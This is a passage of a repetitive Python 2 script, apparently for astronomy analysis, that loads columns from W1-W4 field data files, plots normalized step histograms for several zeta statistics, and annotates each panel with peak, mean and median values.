color='b',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W2_50(x))],np.average(q_W2_50),np.median(q_W2_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W3_50(x))],np.average(q_W3_50),np.median(q_W3_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W4_50(x))],np.average(q_W4_50),np.median(q_W4_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W2_75(x))],np.average(q_W2_75),np.median(q_W2_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W3_75(x))],np.average(q_W3_75),np.median(q_W3_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W4_75(x))],np.average(q_W4_75),np.median(q_W4_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{gal}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 1\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=3\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nx = linspace(0,2,500)\n\ngauss_q_W1_50 = gaussian_kde(q_W1_50)\ngauss_q_W2_50 = gaussian_kde(q_W2_50)\ngauss_q_W3_50 = gaussian_kde(q_W3_50)\ngauss_q_W4_50 = gaussian_kde(q_W4_50)\ngauss_q_W1_75 = gaussian_kde(q_W1_75)\ngauss_q_W2_75 = gaussian_kde(q_W2_75)\ngauss_q_W3_75 = gaussian_kde(q_W3_75)\ngauss_q_W4_75 = gaussian_kde(q_W4_75)\n\nplt.subplot(452)\nrangemax=4\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n#plt.plot(x,gauss_q_W1_50(x),'b', linewidth=0.5)\nax=plt.subplot(452)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_50(x))],np.average(q_W1_50),np.median(q_W1_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W2_50(x))],np.average(q_W2_50),np.median(q_W2_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W3_50(x))],np.average(q_W3_50),np.median(q_W3_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W4_50(x))],np.average(q_W4_50),np.median(q_W4_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W2_75(x))],np.average(q_W2_75),np.median(q_W2_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W3_75(x))],np.average(q_W3_75),np.median(q_W3_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W4_75(x))],np.average(q_W4_75),np.median(q_W4_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{1}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 2\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=5\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(453)\nrangemax=4\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(453)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{z}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 3\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=7\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(454)\nrangemax=4\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(454)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 4\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=9\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], 